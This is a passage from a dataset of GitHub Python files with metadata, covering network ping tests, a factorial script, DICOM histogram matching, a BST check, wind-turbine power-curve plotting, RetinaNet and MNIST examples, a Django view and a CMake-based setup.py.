LKP\n for i in range(len(LKP_IP4_1)):\n self.lkp_ifconfig.set_ip_address(LKP_IP4_1[i], LKP_MSK_1[i], None)\n for i in range(len(LKP_IP4_2)):\n self.lkp_ifconfig.set_ip_address(LKP_IP4_2[i], LKP_MSK_2[i], None)\n for i in range(len(LKP_IP4_3)):\n self.lkp_ifconfig.set_ip_address(LKP_IP4_3[i], LKP_MSK_3[i], None)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for addr in DUT_IP4_1:\n log.info(\"Ping from {} to {} ...\".format(LKP_IP4_1[0], addr))\n assert self.ping(self.lkp_hostname, addr, 4, ipv6=False, src_addr=LKP_IP4_1[0]) is True, \\\n \"Failed to ping {} from {}\".format(addr, LKP_IP4_1[0])\n for addr in DUT_IP4_2:\n log.info(\"Ping from {} to {} ...\".format(LKP_IP4_2[0], addr))\n assert self.ping(self.lkp_hostname, addr, 4, ipv6=False, src_addr=LKP_IP4_2[0]) is True, \\\n \"Failed to ping {} from {}\".format(addr, LKP_IP4_2[0])\n for addr in DUT_IP4_3:\n log.info(\"Ping from {} to {} ...\".format(LKP_IP4_3[0], addr))\n assert self.ping(self.lkp_hostname, addr, 4, ipv6=False, src_addr=LKP_IP4_3[0]) is True, \\\n \"Failed to ping 
{} from {}\".format(addr, LKP_IP4_3[0])\n\n\nif __name__ == \"__main__\":\n pytest.main([__file__, \"-s\", \"-v\"])\n","repo_name":"dgubanovv/qa-tests","sub_path":"usb_fw_sleep_proxy.py","file_name":"usb_fw_sleep_proxy.py","file_ext":"py","file_size_in_byte":13835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18813995089","text":"\n \n# write a python program to using a function to print factroial number series from n to m numbers.\n\ndef fact_calculate(number):\n fact = 1\n for i in range(1,number+1):\n fact = fact * i\n return fact\n \n\nn = int(input(\"Please enter firt number.\"))\nm = int(input(\"Please enter secound number.\"))\nfor i in range(n,m+1):\n print(fact_calculate(i))","repo_name":"Saurabh1Barasiya/100_days_of_code","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72030606167","text":"try:\n import ROOT\n ROOTfound=True\nexcept ImportError:\n ROOTfound=False\n print(\"WARNING Normalizer.py: ROOT not found\")\nimport numpy as np\nfrom dicom_tools.FileReader import FileReader\n\nclass Normalizer:\n\n def __init__(self, verbose=False):\n self.verbose = verbose\n self.RootOutput = False\n self.layer=-1\n self.NormLayer=-1\n if self.verbose:\n print(\"Normalizer: init verbose\\n\")\n\n self.externalTemplateSetted = False\n self.externalTemplate = None\n\n def setExternalTemplate(self, dcmfile):\n freader = FileReader(dcmfile, False, self.verbose)\n dataRGB, unusedROI = freader.read(False)\n self.externalTemplateSetted = True\n self.externalTemplate = dataRGB[:,:,0]\n self.NormLayer = -1\n \n def setNormLayer(self, layer=-1):\n self.NormLayer=layer\n self.externalTemplateSetted = False\n self.externalTemplate = None\n \n def setRootOutput(self, prefix=\"\"):\n self.RootOutput = True\n self.allHistos = []\n self.RootPrefix = prefix\n\n def writeRootOutputOnFile(self, outfname=\"out.root\"):\n outfile= ROOT.TFile(outfname,\"RECREATE\")\n for histo in self.allHistos:\n histo.Write()\n\n outfile.Write()\n outfile.Close()\n \n \n def hist_match(self, source, template):\n \"\"\"\n Adjust the pixel values of a grayscale image such that its histogram\n matches that of a target image\n \n Arguments:\n -----------\n source: np.ndarray\n Image to transform; the histogram is computed over the flattened array\n template: np.ndarray\n Template image; can have different dimensions to source\n Returns:\n -----------\n matched: np.ndarray\n The transformed output image\n \"\"\"\n\n oldshape = source.shape\n # contiguous flattened array\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html\n source = source.ravel()\n template = template.ravel()\n \n # get the set of unique pixel values and their corresponding indices and\n # counts\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.unique.html\n s_values, bin_idx, s_counts = np.unique(source, return_inverse=True,\n return_counts=True)\n t_values, t_counts = np.unique(template, return_counts=True)\n \n # take the cumsum of the counts and normalize by the number of pixels to\n # get the empirical cumulative distribution functions for the source and\n # template images (maps pixel value --> quantile)\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.cumsum.html?highlight=sum\n s_quantiles = np.cumsum(s_counts).astype(np.float64)\n s_quantiles /= s_quantiles[-1]\n t_quantiles = 
np.cumsum(t_counts).astype(np.float64)\n t_quantiles /= t_quantiles[-1]\n \n # interpolate linearly to find the pixel values in the template image\n # that correspond most closely to the quantiles in the source image\n interp_t_values = np.interp(s_quantiles, t_quantiles, t_values)\n \n if self.RootOutput:\n suffix=str(self.layer)\n prefix=self.RootPrefix\n nBin = 500\n cumsumOrig = ROOT.TH1F(prefix+\"cumsumOrig\"+suffix,prefix+\"cumsumOrig\"+suffix,nBin,s_values.min(),s_values.max())\n cumsumTemplate = ROOT.TH1F(prefix+\"cumsumTemplate\"+suffix,prefix+\"cumsumTemplate\"+suffix,nBin,t_values.min(),t_values.max())\n cumsumInterp = ROOT.TH1F(prefix+\"cumsumInterp\"+suffix,prefix+\"cumsumInterp\"+suffix,nBin,interp_t_values.min(),interp_t_values.max())\n for s_value in s_values:\n cumsumOrig.Fill(s_value)\n for t_value in t_values:\n cumsumTemplate.Fill(s_value)\n for interp_t_value in interp_t_values:\n cumsumInterp.Fill(interp_t_value)\n \n self.allHistos.append(cumsumTemplate) \n self.allHistos.append(cumsumOrig) \n self.allHistos.append(cumsumInterp)\n\n return interp_t_values[bin_idx].reshape(oldshape)\n\n\n \n def match_all(self, data):\n norm_layer=self.NormLayer\n \n matched=np.zeros(data.shape)\n if len(data.shape)==4:\n layers = len(data[:,:,:,0])\n if not self.externalTemplateSetted:\n if norm_layer <0:\n norm_layer = int(layers/2+0.5)\n matched[norm_layer,:,:,0]=matched[norm_layer,:,:,1]=matched[norm_layer,:,:,2] = data[norm_layer,:,:,0]\n template = data[norm_layer,:,:,0]\n else:\n template = self.externalTemplate\n \n for self.layer in xrange(0,layers):\n if self.layer == norm_layer:\n continue\n matched[self.layer,:,:,0]=matched[self.layer,:,:,1]=matched[self.layer,:,:,2]= self.hist_match(data[self.layer,:,:,0], template)\n elif len(data.shape)==3:\n layers = len(data)\n if norm_layer <0:\n norm_layer = int(layers/2+0.5)\n matched[norm_layer] = data[norm_layer]\n for self.layer in xrange(0,layers):\n if self.layer == norm_layer:\n continue\n matched[self.layer] = self.hist_match(data[self.layer], data[norm_layer])\n\n else:\n print(\"ERROR hist_match data has not 4 axis nor 3\")\n \n return matched\n","repo_name":"carlomt/dicom_tools","sub_path":"dicom_tools/Normalizer.py","file_name":"Normalizer.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"25343128203","text":"\"\"\"\nhttps://www.hackerrank.com/challenges/ctci-is-binary-search-tree/problem\n\"\"\"\n\"\"\" Node is defined as\nclass node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\"\"\"\n\ndef checkBST(root):\n in_order_list = []\n in_order_stk = []\n node1 = root\n while node1 or len(in_order_stk) > 0:\n if node1:\n in_order_stk.append(node1)\n node1 = node1.left\n else:\n node1 = in_order_stk.pop()\n in_order_list.append(node1.data)\n node1 = node1.right \n\n l = len(in_order_list) - 1\n\n if l <= 0:\n return False\n while l > 0:\n if in_order_list[l] <= in_order_list[l-1]:\n return False\n l -= 1\n return True","repo_name":"nirmalya123/tricky_algorithms","sub_path":"check_if_bst.py","file_name":"check_if_bst.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10408762080","text":"# Import Modules\n# In[]:\n\nimport sys\nimport os\nimport os.path as path\nimport xarray as xr\nfrom netCDF4 import Dataset\nimport numpy as np\nimport pandas as pd\nfrom scipy import 
interpolate\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\n\n# In[]:\nsys.path.insert(0, os.path.dirname(os.getcwd()))\nfrom data_processing_slice import *\nfrom plotting_slice import *\n\n# In[]:\ndef compute_indices_weights_for_slices (case_dir_map, hub_height):\n for case in case_dir_map.keys():\n dz = case_dir_map[case]['dz']\n\n z_ind1 = hub_height // int(dz)\n z_ind2 = z_ind1 + 1\n z1 = int(dz*z_ind1)\n z2 = int(dz*z_ind2)\n w1 = 1.0 - (hub_height - z1)/dz\n w2 = 1.0 - (z2 - hub_height)/dz\n print('z_indices: [{}, {}], z: [{}, {}], weights: [{}, {}]'.format(\n z_ind1, z_ind2, z1, z2, w1, w2))\n\n case_dir_map[case]['z_indices'] = [z_ind1, z_ind2]\n case_dir_map[case]['weights'] = [w1, w2]\n \n return case_dir_map\n\n# In[]:\ndef prepare_NREL_data (WRF_result_base_loc, vhub):\n NREL_Data = pd.read_csv(os.path.join(WRF_result_base_loc,'NREL_5MW_126_RWT.csv'))\n ws_NREL = list(NREL_Data['Wind Speed [m/s]'])\n power_NREL = list(NREL_Data['Power [kW]'])\n\n f = interpolate.interp1d(ws_NREL, power_NREL)\n power_interp = f(vhub)\n \n return NREL_Data, ws_NREL, power_NREL, power_interp\n\n# In[]\ndef initialize_tabulated_data (power_interp, ind1_for_tab, ind2_for_tab, ind3_for_tab):\n case_tab = ['NREL']\n power1_tab = [power_interp[ind1_for_tab]*1.0e+3]\n power2_tab = [power_interp[ind2_for_tab]*1.0e+3]\n power3_tab = [power_interp[ind3_for_tab]*1.0e+3]\n error1_tab = [0.0]\n error2_tab = [0.0]\n error3_tab = [0.0]\n\n return case_tab, power1_tab, power2_tab, power3_tab, error1_tab, error2_tab, error3_tab\n\n# In[]:\ndef read_power_for_a_wind_speed (WRF_result_base_loc, case, outfile, ind_vhub, ws_hub, power_case_ws):\n case_for_ws = path.join(WRF_result_base_loc, case, 'power_curve_{}'.format(ws_hub))\n #print ('case_for_ws: {}'.format(case_for_ws))\n case_nc_file = path.join(case_for_ws, outfile)\n #print ('case_nc_file: {}'.format(case_nc_file))\n case_data = Dataset(case_nc_file, mode='r')\n case_power = case_data.variables['POWER'][:]\n #print ('case_power: ', case_power)\n case_data.close()\n\n if (len(case_power) <2):\n power_case_ws[ind_vhub] = np.nan\n else:\n power_case_ws[ind_vhub] = case_power[1]\n \n return power_case_ws\n\n\n# In[]:\ndef read_power_for_a_case (WRF_result_base_loc, case, vhub, power_interp, outfile, \\\n case_dir_map, case_tab, \\\n power1_tab, power2_tab, power3_tab, \\\n error1_tab, error2_tab, error3_tab, \\\n ind1_for_tab, ind2_for_tab, ind3_for_tab):\n print('Case: {}'.format(case))\n print('Legend: {}'.format(case_dir_map[case]['legend']))\n case_tab.append(case)\n\n power_case_ws = np.zeros(len(vhub))\n for ind_vhub, ws_hub in enumerate(vhub):\n power_case_ws = read_power_for_a_wind_speed (WRF_result_base_loc, case, outfile, \\\n ind_vhub, ws_hub, power_case_ws)\n #print('power_case_ws: ', power_case_ws)\n case_dir_map[case]['power'] = power_case_ws\n\n error_NREL = (power_case_ws*1e-3/power_interp - 1.0)*100\n case_dir_map[case]['error'] = error_NREL\n\n print('Power: {}'.format(case_dir_map[case]['power']))\n print('Error w.r.t. 
NREL: {}'.format(case_dir_map[case]['error']))\n\n power1_tab.append(float('%.0f'%(power_case_ws[ind1_for_tab])))\n power2_tab.append(float('%.0f'%(power_case_ws[ind2_for_tab])))\n power3_tab.append(float('%.0f'%(power_case_ws[ind3_for_tab])))\n error1_tab.append(float('%5.2f'%(error_NREL[ind1_for_tab])))\n error2_tab.append(float('%5.2f'%(error_NREL[ind2_for_tab])))\n error3_tab.append(float('%5.2f'%(error_NREL[ind3_for_tab])))\n\n print ('\\n')\n \n return case_dir_map, case_tab, power1_tab, power2_tab, power3_tab, error1_tab, error2_tab, error3_tab\n\n\n# In[]:\ndef tabulate_data_for_cases (tab_data_file, vhub, case_tab, \\\n power1_tab, power2_tab, power3_tab, \\\n error1_tab, error2_tab, error3_tab, \\\n ind1_for_tab, ind2_for_tab, ind3_for_tab):\n tabulated_data = pd.DataFrame(index = case_tab)\n tabulated_data['power[vhub = {}]'.format(vhub[ind1_for_tab])] = power1_tab\n tabulated_data['error[vhub = {}]'.format(vhub[ind1_for_tab])] = error1_tab\n tabulated_data['power[vhub = {}]'.format(vhub[ind2_for_tab])] = power2_tab\n tabulated_data['error[vhub = {}]'.format(vhub[ind2_for_tab])] = error2_tab\n tabulated_data['power[vhub = {}]'.format(vhub[ind3_for_tab])] = power3_tab\n tabulated_data['error[vhub = {}]'.format(vhub[ind3_for_tab])] = error3_tab\n print('Tabulated Dataframe: \\n{}\\n'.format(tabulated_data))\n tabulated_data.to_csv(tab_data_file)\n \n \n# In[]:\ndef plot_power_curve_for_cases (NREL_Data, vhub, case_keys, case_dir_map, plt_title, \\\n figFileName, savefig):\n pr = 1.00\n\n #plt.cla()\n # POWER Curve\n plt.figure()\n plt.plot(NREL_Data['Wind Speed [m/s]'], NREL_Data['Power [kW]']*1e-3/pr, 'k-', label = 'NREL data')\n #plt.plot([0,20],[5,5],'k--',label='Rated power')\n for case in case_keys:\n power_case_ws = case_dir_map[case]['power']\n legend = case_dir_map[case]['legend']\n line_style = case_dir_map[case]['line_style']\n plt.plot(vhub, power_case_ws*1e-6/pr, line_style, label=legend)\n plt.title(plt_title,fontsize=12)\n plt.xlim(2.9,15.1)\n plt.xticks(np.arange(3,15,1.5))\n plt.ylim(0,7.0)\n plt.xlabel(r'Hub-height wind speed [m s$^{-1}$]',fontsize=12)\n plt.ylabel(r'Power (MW)',fontsize=12)\n plt.legend(loc='best')\n plt.tick_params(axis = 'x', labelsize=12)\n plt.tick_params(axis = 'y', labelsize=12)\n \n if savefig:\n plt.savefig(figFileName, bbox_inches='tight')\n \n plt.show()\n \n# In[]:\ndef plot_power_curve_error_for_cases (vhub, case_keys, case_dir_map, plt_title):\n #plt.cla()\n # Error w.r.t. NREL data\n plt.figure()\n for case in case_keys:\n error_case_ws = case_dir_map[case]['error']\n legend = case_dir_map[case]['legend']\n line_style = case_dir_map[case]['line_style']\n plt.plot(vhub, error_case_ws, line_style, label=legend)\n plt.title(plt_title,fontsize=12)\n plt.xlim(2.9,15.1)\n plt.xticks(np.arange(3,15,1.5))\n plt.xlabel(r'Hub-height wind speed [m s$^{-1}$]',fontsize=12)\n plt.ylabel(r'Percent error w.r.t. 
NREL data',fontsize=12)\n plt.legend(loc='best')\n plt.gca().tick_params(labelsize=10)\n\n plt.show()\n \n \n# In[]:\ndef read_wrfout_data_for_case_ws (WRF_result_base_loc, case, ws, outfile):\n case_loc = os.path.join(WRF_result_base_loc, case)\n case_ws_loc = os.path.join(case_loc, 'power_curve_{}'.format(ws))\n \n case_ws_outfile = path.join(case_ws_loc, outfile)\n case_ws_wrf_data = xr.open_dataset(case_ws_outfile)\n \n return case_ws_wrf_data\n\n# In[]:\ndef read_tsout_data_for_case_ws (WRF_result_base_loc, case, ws, tsoutfile):\n case_loc = path.join(WRF_result_base_loc, case)\n case_ws_loc = path.join(case_loc, 'power_curve_{}'.format(ws))\n #print('case/wind_speed loc: {}'.format(case_ws_loc))\n \n case_ws_tsoutfile = path.join(case_ws_loc, tsoutfile)\n case_ws_ts_data = xr.open_dataset(case_ws_tsoutfile)\n \n return case_ws_ts_data\n\n# In[]:\ndef get_hub_height_slice_data_case_ws (WRF_result_base_loc, case, ws, outfile, tsoutfile, \\\n time_ind, z_ind1, z_ind2, w1, w2):\n case_ws_wrf_data = read_wrfout_data_for_case_ws (WRF_result_base_loc, case, ws, outfile)\n case_ws_ts_data = read_tsout_data_for_case_ws (WRF_result_base_loc, case, ws, tsoutfile)\n DX, DY = case_ws_wrf_data.DX, case_ws_wrf_data.DY\n #print('DX: {}, DY: {}, DZ: {}'.format(DX, DY, DZ))\n\n slice_data1_U = extract_slices_from_tsout_file (case_ws_ts_data, 'UTS', z_ind1, time_ind)\n slice_data1_V = extract_slices_from_tsout_file (case_ws_ts_data, 'VTS', z_ind1, time_ind)\n slice_data1_UMAG = compute_u_mag_for_slice (slice_data1_U, slice_data1_V)\n\n slice_data2_U = extract_slices_from_tsout_file (case_ws_ts_data, 'UTS', z_ind2, time_ind)\n slice_data2_V = extract_slices_from_tsout_file (case_ws_ts_data, 'VTS', z_ind2, time_ind)\n slice_data2_UMAG = compute_u_mag_for_slice (slice_data2_U, slice_data2_V)\n\n slice_data_wgt_UMAG = w1*slice_data1_UMAG + w2*slice_data2_UMAG\n \n return slice_data_wgt_UMAG, DX, DY\n \n \n# In[]:\ndef get_hub_height_slice_data_in_case_data_map (case_dir_map, WRF_result_base_loc, ws, \\\n outfile, tsoutfile, time_ind):\n for case in case_dir_map.keys():\n z_ind1 = case_dir_map[case]['z_indices'][0]\n z_ind2 = case_dir_map[case]['z_indices'][1]\n w1 = case_dir_map[case]['weights'][0]\n w2 = case_dir_map[case]['weights'][1]\n #print('z_indices: [{}, {}], weights: [{}, {}]'.format(z_ind1, z_ind2, w1, w2))\n\n slice_data_wgt_UMAG, DX, DY = \\\n get_hub_height_slice_data_case_ws (WRF_result_base_loc, case, ws, outfile, tsoutfile, \\\n time_ind, z_ind1, z_ind2, w1, w2)\n \n case_dir_map[case]['slice_data'] = slice_data_wgt_UMAG\n case_dir_map[case]['DX'] = DX\n case_dir_map[case]['DY'] = DY\n \n return case_dir_map\n\n# In[]:\ndef plot_hub_height_slice_data_all_cases_separately (case_dir_map, GAD_param_slice_loc, slice_dir, \\\n ws, cont_levels_count, qoi_cont_range, \\\n xlim, ylim):\n for case in case_dir_map.keys():\n case_legend = case_dir_map[case]['legend']\n\n slice_data_wgt_UMAG = case_dir_map[case]['slice_data']\n DX = case_dir_map[case]['DX']\n DY = case_dir_map[case]['DY']\n\n plot_loc = os.path.join(GAD_param_slice_loc, slice_dir, 'power_curve_{}'.format(ws))\n os.system('mkdir -p %s'%plot_loc)\n image_name = 'slice_{}_{}.png'.format(case, 'UMAG')\n\n plot_contour_slice(slice_data_wgt_UMAG, DX, DY, plot_loc, image_name, \\\n 'UMAG', 'UMAG', 'm/s', case_legend, \\\n cont_levels_count, qoi_cont_range, xlim, 
ylim)\n","repo_name":"pkjha-aero/AlphaVentus","sub_path":"GAD_Param_Study/helper_GAD.py","file_name":"helper_GAD.py","file_ext":"py","file_size_in_byte":10481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"315712436","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image\r\nimport os\r\nimport cv2\r\nimport time\r\nimport numpy as np\r\nfrom keras_retinanet import models\r\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image\r\nfrom keras_retinanet.utils.visualization import draw_box, draw_caption\r\nfrom keras_retinanet.utils.colors import label_color\r\n\r\n# 获取文件夹中的文件路径\r\nimport os\r\ndef get_filePathList(dirPath, partOfFileName=''):\r\n allFileName_list = list(os.walk(dirPath))[0][2]\r\n fileName_list = [k for k in allFileName_list if partOfFileName in k]\r\n filePath_list = [os.path.join(dirPath, k) for k in fileName_list]\r\n return filePath_list\r\n \r\n# 检测单张图片,返回画框后的图片\r\ndef get_detectedImage(retinanet_model, imageFilePath):\r\n labels_to_names = {0:'fish', 1:'human_face'}\r\n startTime = time.time()\r\n image = read_image_bgr(imageFilePath)\r\n new_size = (416, 416) \r\n image = cv2.resize(image, new_size, interpolation=cv2.INTER_LANCZOS4) \r\n draw = image.copy()\r\n draw = cv2.cvtColor(draw, cv2.COLOR_BGR2RGB)\r\n image = preprocess_image(image)\r\n boxes, scores, labels = retinanet_model.predict_on_batch(np.expand_dims(image, axis=0))\r\n for box, score, label in zip(boxes[0], scores[0], labels[0]):\r\n if score < 0.5:\r\n break\r\n color = label_color(label)\r\n b = box.astype(int)\r\n draw_box(draw, b, color=color)\r\n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\r\n draw_caption(draw, b, caption)\r\n usedTime = time.time() - startTime\r\n print(\"检测这张图片用时%.2f秒\" %usedTime)\r\n return draw\r\n\r\n# 对若干图片做目标检测\r\ndef detect_images(modelFilePath, imageFilePath_list, out_mp4FilePath=None):\r\n retinanet_model = models.load_model(modelFilePath, backbone_name='resnet50')\r\n cv2.namedWindow('result', cv2.WINDOW_NORMAL)\r\n width = 1000\r\n height = 618\r\n size = (width, height)\r\n cv2.resizeWindow('result', width, height)\r\n if out_mp4FilePath is not None:\r\n fourcc = cv2.VideoWriter_fourcc('M', 'P', 'E', 'G')\r\n videoWriter = cv2.VideoWriter(out_mp4FilePath, fourcc, 1.7, size)\r\n for imageFilePath in imageFilePath_list:\r\n out_image_ndarray = get_detectedImage(retinanet_model, imageFilePath)\r\n resized_image_ndarray = cv2.resize(out_image_ndarray, size, interpolation=cv2.INTER_LANCZOS4) \r\n # 图片第1维是宽,第2维是高,第3维是RGB\r\n # PIL库图片第三维是RGB,cv2库图片第三维正好相反,是BGR\r\n cv2.imshow('result', resized_image_ndarray[...,::-1])\r\n time.sleep(0.4)\r\n if out_mp4FilePath is not None:\r\n videoWriter.write(resized_image_ndarray[...,::-1])\r\n if cv2.waitKey(1) and 0xFF == 27:\r\n break\r\n cv2.destroyAllWindows()\r\n\r\n# 解析运行代码文件时传入的参数\r\nimport argparse\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-d', '--dirPath', type=str, help='directory path', default='./n01440764') \r\n parser.add_argument('-s', '--suffix', type=str, default='.JPEG')\r\n parser.add_argument('-m', '--modelFilePath', type=str, default='./retinanet_inference.h5')\r\n parser.add_argument('-o', '--out_mp4FilePath', type=str, default='fish_output.avi')\r\n argument_namespace = parser.parse_args()\r\n return argument_namespace \r\n\r\n# 主函数 \r\nif __name__ == '__main__':\r\n argument_namespace = parse_args()\r\n dirPath = 
argument_namespace.dirPath\r\n suffix = argument_namespace.suffix\r\n modelFilePath = argument_namespace.modelFilePath\r\n out_mp4FilePath = argument_namespace.out_mp4FilePath\r\n imageFilePath_list = get_filePathList(dirPath, suffix)\r\n detect_images(modelFilePath, imageFilePath_list, out_mp4FilePath)","repo_name":"ronnieblanc/keras_RetinaNet","sub_path":"06_detectImages.py","file_name":"06_detectImages.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34146341499","text":"import numpy as pd\nfrom numpy import ndarray\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\n\n\n# Load the dataset\n(features_train, labels_train), (features_test, labels_test) = mnist.load_data()\n\n# Plot 4 Images as gray scale\nfor i in range(4):\n plt.subplot(221 + i)\n plt.imshow(features_train[i], cmap=plt.get_cmap('gray'))\n\nplt.show()\n\n# Preprocess the dataset\nnum_pixels = features_train.shape[1] * features_train.shape[2]\nfeatures_train = features_train.reshape(features_train.shape[0], num_pixels).astype('float32')\nfeatures_test = features_test.reshape(features_test.shape[0], num_pixels).astype('float32')\n\n# Scale the inputs\nfeatures_train = features_train / 255\nfeatures_test = features_test / 255\n\n# One hot encode the output\nlabels_train = np_utils.to_categorical(labels_train)\nlabels_test = np_utils.to_categorical(labels_test)\nnum_classes = labels_test.shape[1]\n\n# Build the model\nmodel = Sequential()\nmodel.add(Dense(1000, input_dim=num_pixels, activation='relu'))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.summary()\n\n# Run the model\nmodel.fit(features_train, labels_train, validation_data=(features_test, labels_test), epochs=5, batch_size=1024, verbose=1)","repo_name":"aleksandar-aleksandrov/machine-learning","sub_path":"Pro Machine Learning Algorithms/Chapter 7/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10199030848","text":"# Program to flatten a list using recursions. 
Input list can contain any levels of sub-lists\r\n\r\ndef ex15(arr):\r\n # empty than return\r\n if not arr:\r\n return arr\r\n # check if list than call function again\r\n if type(arr[0]) is list:\r\n return ex15(*arr[:1]) + ex15(arr[1:])\r\n return arr[:1] + ex15(arr[1:])\r\n\r\n# Run the function for given input\r\nip=[1,2,3,4,5, [10,20,30,4,50,60,100],90,200,[300,10]]\r\nprint(ex15(ip))","repo_name":"sudh29/Trainings","sub_path":"ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3002398443","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.template import loader\nfrom app_MVT_Matias_Puletti.models import Familia\n# Create your views here.\n\n\ndef datos_familia(request):\n template=loader.get_template('familia_template.html')\n model = Familia(nombre_familiar=True, edad_familiar= edad_familiar, nacimiento_familiar= nacimiento_familiar)\n model.save()\n render=template.render({'model': model})\n \n return HttpResponse(render)\n\n\ndef listado_familia(request):\n template=loader.get_template('familia_template.html')\n lista_familia = Familia.objects.all()\n render=template.render({'lista_familia': lista_familia})\n return HttpResponse(render)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MatiasBran/MVT-Matias_Puletti","sub_path":"app_MVT_Matias_Puletti/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23515372728","text":"import subprocess\nfrom pathlib import Path\nimport platform\nimport sys\nfrom itertools import chain\nfrom distutils.command.build_py import build_py as _build_py\nfrom distutils.command.clean import clean as _clean\n\nimport shutil\nfrom setuptools import setup, Extension, find_packages\nfrom setuptools.command.build_ext import build_ext as _build_ext\nfrom setuptools.command.install import install as _install\n\nIS_WINDOWS = (platform.system() == 'Windows')\nIS_DARWIN = (platform.system() == 'Darwin')\nIS_LINUX = (platform.system() == 'Linux')\n\nREQUIREMENTS_FILE = 'requirements.txt'\nPACKAGE_NAME = 'inference_engine'\n\nPACKAGE = Path(PACKAGE_NAME)\nC_LIB_NAME = '{}._C'.format(PACKAGE_NAME)\n\n_build_cmd = ['cmake', '--build', '.']\n\nINFERENCE_ENGINE_DIR = None\nBUNDLE_INFERENCE_ENGINE = False\n\n\ndef parse_command_line_options(cls):\n \"\"\"Propagates command line options to sub-commands.\n Allows to run install command with build_ext options\"\"\"\n\n base_user_options = getattr(cls, 'user_options', [])\n base_boolean_options = getattr(cls, 'boolean_options', [])\n base_run = cls.run\n base_init_options = cls.initialize_options\n\n cls.user_options = base_user_options + [\n ('copy-ie-libs', None, 'Copy Inference Engine Libraries to package directory'),\n ('inference-engine-dir=', None, 'Path to Inference Engine directory')\n ]\n\n cls.boolean_options = base_boolean_options + [\n 'copy-ie-libs'\n ]\n\n def initialize_options(self):\n self.copy_ie_libs = False\n self.inference_engine_dir = None\n base_init_options(self)\n\n def run(self):\n global INFERENCE_ENGINE_DIR\n global BUNDLE_INFERENCE_ENGINE\n\n if self.copy_ie_libs:\n BUNDLE_INFERENCE_ENGINE = True\n\n if self.inference_engine_dir:\n INFERENCE_ENGINE_DIR = self.inference_engine_dir\n\n base_run(self)\n\n cls.initialize_options = initialize_options\n cls.run = run\n return 
cls\n\n\n@parse_command_line_options\nclass install(_install):\n pass\n\n\n@parse_command_line_options\nclass build_py(_build_py):\n pass\n\n\n@parse_command_line_options\nclass build_ext(_build_ext):\n def run(self):\n if not self.extensions:\n return\n\n for i, ext in enumerate(self.extensions):\n if ext.name == C_LIB_NAME:\n self._build_cmake()\n self.extensions.pop(i)\n break\n\n super().run()\n\n def _build_cmake(self):\n print(\"Building C++ extension\")\n if Path.cwd().joinpath(\"Makefile\").is_file():\n # in build directory, run make only\n subprocess.call(_build_cmd)\n else:\n # compile extension library and\n self.build_cmake_lib()\n print(\"Built C++ extension\")\n\n def build_cmake_lib(self):\n def save_call(*args, error_msg=None, **kwargs):\n if subprocess.call(*args, **kwargs) != 0:\n if error_msg:\n print(error_msg)\n shutil.rmtree(tmp_build_dir.as_posix(), ignore_errors=True)\n sys.exit(1)\n\n tmp_build_dir = Path(\"tmp_build\")\n destination = Path(self.build_lib) / PACKAGE_NAME if not self.inplace else Path(PACKAGE_NAME)\n tmp_build_dir.mkdir(exist_ok=False)\n\n _python_executable_opt = ['-DPYTHON_EXECUTABLE={}'.format(sys.executable)]\n _build_type_opt = ['-DCMAKE_BUILD_TYPE=Release']\n _generator_opt = ['-G', 'NMake Makefiles' if IS_WINDOWS else \"Unix Makefiles\"]\n\n _optional = []\n if BUNDLE_INFERENCE_ENGINE:\n _optional.append('-DCOPY_IE_LIBS=ON')\n\n if INFERENCE_ENGINE_DIR:\n _optional.append('-DInferenceEngine_DIR={}'.format(INFERENCE_ENGINE_DIR))\n\n _cmake_cmd = list(chain(['cmake'], _generator_opt, _build_type_opt, _python_executable_opt, _optional, ['..']))\n\n save_call(_cmake_cmd, cwd=tmp_build_dir.as_posix(), error_msg=\"Cmake generator failed\")\n save_call(_build_cmd, cwd=tmp_build_dir.as_posix(), error_msg=\"Build command failed\")\n\n build_ext.copy_compiled_libs(tmp_build_dir / PACKAGE_NAME, destination)\n shutil.rmtree(tmp_build_dir.as_posix(), ignore_errors=False)\n\n @staticmethod\n def copy_compiled_libs(source_dir, destination):\n extensions = ['so', 'dll', 'pyd']\n for path in chain.from_iterable(source_dir.glob(\"*.%s\" % ext) for ext in extensions):\n shutil.copy(path.as_posix(), destination.as_posix())\n\n\nclass clean(_clean):\n def 